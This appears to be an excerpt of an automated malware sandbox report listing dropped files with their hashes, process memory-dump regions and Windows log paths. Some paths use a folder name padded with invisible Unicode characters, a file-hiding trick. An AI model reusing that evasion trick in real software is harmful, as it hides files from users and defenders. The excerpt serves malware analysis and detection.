SHA1 dd7b15671ed35f79c02ec2440b8674672a59aa4d
SHA256 8229eb425b4d76cc105114b8d1cb5a28a7cec58763927ba7f7782751afbcf5b2
SHA512 4778b7632d093fb6e0de218684fa320a52170185663bbf4732b0383c11c5b032b5d35738127ca62035b05981a2c640c9ecbcb63dc1169a56c7c104634649c708

C:\Users\Admin\AppData\Local\Temp\ ​   ‎ ‌‍ \Common Files\Documents\DebugExit.txt

MD5 8ce55184865d7c1cf37b5e4e776c0231
SHA1 04784a8853508e41bbd1d4b99d37c4c22fc6b1e9
SHA256 8ad52a1c19e2f68a78a3eb93ca3a1d03d3ace97549f870fa0d2ff5e88553bc62
SHA512 642a692ef1cf6dc56555002e249b7c149c954ccb787389db04793b44abda8d47c63d04f0ad8751655591c8d4093b4c4d86d2daec0c74989de6c04e6c6e90a257

C:\Users\Admin\AppData\Local\Temp\ ​   ‎ ‌‍ \Common Files\Documents\DisconnectGroup.csv

MD5 285115cb2879483b5b6038867f0068cd
SHA1 c8d1602e4977c9ba350222cf99db1fadc1103ad6
SHA256 220c4f1343e3977363d5b14b88805029157da63f3229f0004e1192e991c6356c
SHA512 cab893b0d92d624dad8a7346a8330539a194278bccb34fd2493cef20cb34d052ed73280c09f2d2d3ccab0cee161f5003e6a8cfba9b7a24ddfcec0bbab2e290cb

C:\Users\Admin\AppData\Local\Temp\ ​   ‎ ‌‍ \Common Files\Documents\EnterStep.doc

MD5 d63f23ea54ffab101ae355d160d53db0
SHA1 5527fdc76ffa10d68cf4757ef5e97fbb0d0dcf37
SHA256 42687468e23e73cdb422e6724470a93f57db166678fb44336bd79b1cfd1273e1
SHA512 c2751dfecfac710ef9d645b2b56efebed76b58e6aba91cb99842babab9c4b0150f939c6c5d021a5b3844e0358e0240b5afe9f6aab096ebaf093965fe6aa8672f

C:\Users\Admin\AppData\Local\Temp\ ​   ‎ ‌‍ \Common Files\Documents\GrantBackup.xlsx

MD5 34fd5b07e90217dc1998b19a6e5a9c5c
SHA1 bc68d0864cd49045ed4d9b257a7c4ce341284725
SHA256 dfdbcfe649cae968b7431a39898f84c9f388e919de75015a8d5c8457a1b4f445
SHA512 c24a6b0bad186258d8a0ec060c66ba16f05338bdd891d170bfcf34b238755495b01257af7e2f76b961bbf548e0c7421d58559371da657266834cbd04cb581fe5

memory/5196-266-0x00007FFC3C720000-0x00007FFC3C7ED000-memory.dmp

memory/5196-267-0x00007FFC2B030000-0x00007FFC2B550000-memory.dmp

memory/5196-269-0x0000019821C30000-0x0000019822150000-memory.dmp

memory/5196-279-0x00007FFC2B6D0000-0x00007FFC2BCB9000-memory.dmp

memory/5196-285-0x00007FFC2B550000-0x00007FFC2B6C7000-memory.dmp

memory/5196-280-0x00007FFC41240000-0x00007FFC41263000-memory.dmp

memory/5196-303-0x00007FFC2B6D0000-0x00007FFC2BCB9000-memory.dmp

memory/5196-327-0x00007FFC3C720000-0x00007FFC3C7ED000-memory.dmp

memory/5196-328-0x00007FFC2B030000-0x00007FFC2B550000-memory.dmp

memory/5196-326-0x00007FFC3D4C0000-0x00007FFC3D4F3000-memory.dmp

memory/5196-325-0x00007FFC432E0000-0x00007FFC432ED000-memory.dmp

memory/5196-324-0x00007FFC400A0000-0x00007FFC400B9000-memory.dmp

memory/5196-323-0x00007FFC2B550000-0x00007FFC2B6C7000-memory.dmp

memory/5196-322-0x00007FFC40120000-0x00007FFC40143000-memory.dmp

memory/5196-321-0x00007FFC426D0000-0x00007FFC426E9000-memory.dmp

memory/5196-320-0x00007FFC41210000-0x00007FFC4123D000-memory.dmp

memory/5196-319-0x00007FFC432F0000-0x00007FFC432FF000-memory.dmp

memory/5196-318-0x00007FFC41240000-0x00007FFC41263000-memory.dmp

memory/5196-317-0x00007FFC2AF10000-0x00007FFC2B02C000-memory.dmp

memory/5196-316-0x00007FFC40F50000-0x00007FFC40F5D000-memory.dmp

memory/5196-315-0x00007FFC3D680000-0x00007FFC3D694000-memory.dmp

C:\Windows\Logs\DISM\dism.log

MD5 12bca000d392323075ec302b863c5b5b
SHA1 8ea41151fc0a654c30ed2b25e16aa3b53711b040
SHA256 5c62c0fe3c173b315bea3b9d6717a41b1dda858875b7e44d1f9eecc5b274d185
SHA512 84be4881d2e26b54e2a925b4ee10d6a5e9433bdeb64143992bc02785f97e4a0bc6c9b888260d84dddc5f2b1015dd6a00586b68fbe32127d5aed69bffd7f4310f

C:\Users\Admin\AppData\Local\Temp\REGA260.tmp

MD5 d2a16841be28270e778e7d7bf79f49c0
SHA1 84f447c57d540e05c64862016acce571d09e2bb5
SHA256 69be14d053c0f827a295683ec3e9d8bb2995137a1da24d12660444f05e1b503d
SHA512 b8bc763b345cc2d47defc2c6df6c43a1df8f52cfe2817730c37a6fef9c4b9abf449be38797064c149ee95c3e3f3bb120d8adb1087e40a3b1e09b77d5c77d4348